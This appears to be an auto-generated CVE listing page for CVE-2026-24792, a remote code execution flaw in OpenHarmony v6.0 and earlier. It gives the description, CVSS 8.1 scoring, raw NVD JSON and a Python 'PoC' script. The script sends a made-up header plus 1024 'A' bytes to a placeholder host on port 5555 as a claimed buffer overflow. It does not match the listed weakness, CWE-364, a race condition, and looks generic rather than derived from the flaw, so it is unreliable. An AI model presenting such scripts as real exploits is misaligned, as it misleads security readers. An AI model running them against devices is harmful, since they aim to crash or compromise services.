Security Vulnerability Report
中文
CVE-2026-24792 CVSS 8.1 HIGH

CVE-2026-24792

Published: 2026-05-19 04:16:28
Last Modified: 2026-05-19 14:25:04

Description

in OpenHarmony v6.0 and prior versions allow a remote attacker arbitrary code execution in pre-installed apps.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

No configuration data available.

OpenHarmony <= v6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # Proof of Concept for CVE-2026-24792 # This script demonstrates a potential exploit scenario against OpenHarmony. # Note: This is for educational purposes only. def send_exploit(target_ip, target_port): try: # Constructing a malicious payload that triggers the buffer overflow # Adjust the payload pattern based on specific reverse engineering header = b"\x00\x01\x02\x03" overflow = b"A" * 1024 payload = header + overflow print(f"[*] Connecting to {target_ip}:{target_port}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) print("[*] Sending malicious payload...") s.send(payload) print("[*] Payload sent. Check if the service crashed or code was executed.") s.close() except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": # Replace with actual target IP and Port TARGET_IP = "192.168.1.10" TARGET_PORT = 5555 send_exploit(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24792", "sourceIdentifier": "[email protected]", "published": "2026-05-19T04:16:27.907", "lastModified": "2026-05-19T14:25:04.340", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "in OpenHarmony v6.0 and prior versions allow a remote attacker arbitrary code execution in pre-installed apps."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-364"}]}], "references": [{"url": "https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-04.md", "source": "[email protected]"}]}}